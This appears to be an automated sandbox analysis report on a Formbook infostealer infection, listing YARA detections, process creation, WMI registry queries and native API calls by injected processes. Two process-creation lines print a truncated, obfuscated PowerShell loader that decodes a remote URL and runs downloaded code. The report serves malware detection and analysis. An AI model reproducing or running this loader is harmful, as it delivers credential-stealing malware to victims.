        Source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Mythopoet.ShellExecute akademiseringerne,Kritrima,"","" ,Sennesblgenes
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6618
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6618
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6618Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6618Jump to behavior
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462AD0 NtReadFile,LdrInitializeThunk,20_2_22462AD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462BF0 NtAllocateVirtualMemory,LdrInitializeThunk,20_2_22462BF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462E80 NtReadVirtualMemory,LdrInitializeThunk,20_2_22462E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,20_2_22462EA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462F30 NtCreateSection,LdrInitializeThunk,20_2_22462F30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462FE0 NtCreateFile,LdrInitializeThunk,20_2_22462FE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462F90 NtProtectVirtualMemory,LdrInitializeThunk,20_2_22462F90
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462FB0 NtResumeThread,LdrInitializeThunk,20_2_22462FB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462C70 NtFreeVirtualMemory,LdrInitializeThunk,20_2_22462C70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462CA0 NtQueryInformationToken,LdrInitializeThunk,20_2_22462CA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462D10 NtMapViewOfSection,LdrInitializeThunk,20_2_22462D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462D30 NtUnmapViewOfSection,LdrInitializeThunk,20_2_22462D30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462DD0 NtDelayExecution,LdrInitializeThunk,20_2_22462DD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462DF0 NtQuerySystemInformation,LdrInitializeThunk,20_2_22462DF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22464340 NtSetContextThread,20_2_22464340
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22463010 NtOpenDirectoryObject,20_2_22463010
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22463090 NtSetValueKey,20_2_22463090
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22464650 NtSuspendThread,20_2_22464650
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224635C0 NtCreateMutant,20_2_224635C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462AF0 NtWriteFile,20_2_22462AF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462AB0 NtWaitForSingleObject,20_2_22462AB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462B60 NtClose,20_2_22462B60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462BE0 NtQueryValueKey,20_2_22462BE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462B80 NtQueryInformationFile,20_2_22462B80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462BA0 NtEnumerateValueKey,20_2_22462BA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224639B0 NtGetContextThread,20_2_224639B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462E30 NtWriteVirtualMemory,20_2_22462E30
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462EE0 NtQueueApcThread,20_2_22462EE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462F60 NtCreateProcessEx,20_2_22462F60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462FA0 NtQuerySection,20_2_22462FA0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462C60 NtCreateKey,20_2_22462C60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462C00 NtQueryInformationProcess,20_2_22462C00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462CC0 NtQueryVirtualMemory,20_2_22462CC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462CF0 NtOpenProcess,20_2_22462CF0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22463D70 NtOpenThread,20_2_22463D70
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462D00 NtSetInformationFile,20_2_22462D00
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22463D10 NtOpenProcessToken,20_2_22463D10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462DB0 NtEnumerateKey,20_2_22462DB0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0667CEB4 Sleep,NtProtectVirtualMemory,20_2_0667CEB4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2235A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,20_2_2235A036
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2239A036 NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,20_2_2239A036
        Source: C:\Windows\explorer.exeCode function: 22_2_0B313232 NtCreateFile,NtReadFile,22_2_0B313232
        Source: C:\Windows\explorer.exeCode function: 22_2_0B314E12 NtProtectVirtualMemory,22_2_0B314E12
        Source: C:\Windows\explorer.exeCode function: 22_2_0B314E0A NtProtectVirtualMemory,22_2_0B314E0A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044835C0 NtCreateMutant,LdrInitializeThunk,25_2_044835C0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04483090 NtSetValueKey,LdrInitializeThunk,25_2_04483090
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482C60 NtCreateKey,LdrInitializeThunk,25_2_04482C60
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482C70 NtFreeVirtualMemory,LdrInitializeThunk,25_2_04482C70
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482CA0 NtQueryInformationToken,LdrInitializeThunk,25_2_04482CA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482D00 NtSetInformationFile,LdrInitializeThunk,25_2_04482D00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482D10 NtMapViewOfSection,LdrInitializeThunk,25_2_04482D10
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482DD0 NtDelayExecution,LdrInitializeThunk,25_2_04482DD0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482DF0 NtQuerySystemInformation,LdrInitializeThunk,25_2_04482DF0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,25_2_04482EA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482F30 NtCreateSection,LdrInitializeThunk,25_2_04482F30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482FE0 NtCreateFile,LdrInitializeThunk,25_2_04482FE0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482AD0 NtReadFile,LdrInitializeThunk,25_2_04482AD0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482AF0 NtWriteFile,LdrInitializeThunk,25_2_04482AF0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482B60 NtClose,LdrInitializeThunk,25_2_04482B60
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482BE0 NtQueryValueKey,LdrInitializeThunk,25_2_04482BE0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482BF0 NtAllocateVirtualMemory,LdrInitializeThunk,25_2_04482BF0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482BA0 NtEnumerateValueKey,LdrInitializeThunk,25_2_04482BA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04484650 NtSuspendThread,25_2_04484650
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04483010 NtOpenDirectoryObject,25_2_04483010
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04484340 NtSetContextThread,25_2_04484340
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482C00 NtQueryInformationProcess,25_2_04482C00
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482CC0 NtQueryVirtualMemory,25_2_04482CC0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482CF0 NtOpenProcess,25_2_04482CF0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04483D70 NtOpenThread,25_2_04483D70
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04483D10 NtOpenProcessToken,25_2_04483D10
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482D30 NtUnmapViewOfSection,25_2_04482D30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482DB0 NtEnumerateKey,25_2_04482DB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482E30 NtWriteVirtualMemory,25_2_04482E30
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482EE0 NtQueueApcThread,25_2_04482EE0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482E80 NtReadVirtualMemory,25_2_04482E80
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482F60 NtCreateProcessEx,25_2_04482F60
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482F90 NtProtectVirtualMemory,25_2_04482F90
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482FA0 NtQuerySection,25_2_04482FA0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482FB0 NtResumeThread,25_2_04482FB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_044839B0 NtGetContextThread,25_2_044839B0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482AB0 NtWaitForSingleObject,25_2_04482AB0
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_04482B80 NtQueryInformationFile,25_2_04482B80
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA350 NtCreateFile,25_2_001EA350
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA400 NtReadFile,25_2_001EA400
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA480 NtClose,25_2_001EA480
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA530 NtAllocateVirtualMemory,25_2_001EA530
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA34A NtCreateFile,25_2_001EA34A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA3FA NtReadFile,25_2_001EA3FA
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA47B NtClose,25_2_001EA47B
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_001EA52A NtAllocateVirtualMemory,25_2_001EA52A
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B9DDD NtReadVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtResumeThread,NtClose,25_2_041B9DDD
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041BA036 NtQueryInformationProcess,NtReadVirtualMemory,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,25_2_041BA036
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,25_2_041B9BAF
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B9DE2 NtReadVirtualMemory,NtProtectVirtualMemory,25_2_041B9DE2
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041BA042 NtQueryInformationProcess,25_2_041BA042
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_041B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,25_2_041B9BB2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAB78C2B212_2_00007FFAAB78C2B2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAB78B50612_2_00007FFAAB78B506
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0474F1F016_2_0474F1F0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0474FAC016_2_0474FAC0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_0474EEA816_2_0474EEA8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_08262A6016_2_08262A60
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D027420_2_224D0274
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244B2C020_2_2244B2C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224D12ED20_2_224D12ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224352A020_2_224352A0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D34C20_2_2241D34C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EA35220_2_224EA352
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E132D20_2_224E132D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F03E620_2_224F03E6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243E3F020_2_2243E3F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2247739A20_2_2247739A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF0CC20_2_224DF0CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224370C020_2_224370C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E70E920_2_224E70E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EF0E020_2_224EF0E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224B815820_2_224B8158
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FB16B20_2_224FB16B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2246516C20_2_2246516C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241F17220_2_2241F172
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242010020_2_22420100
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224CA11820_2_224CA118
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E81CC20_2_224E81CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F01AA20_2_224F01AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243B1B020_2_2243B1B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E16CC20_2_224E16CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2244C6E020_2_2244C6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245475020_2_22454750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243077020_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242C7C020_2_2242C7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EF7B020_2_224EF7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E244620_2_224E2446
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242146020_2_22421460
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224EF43F20_2_224EF43F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DE4F620_2_224DE4F6
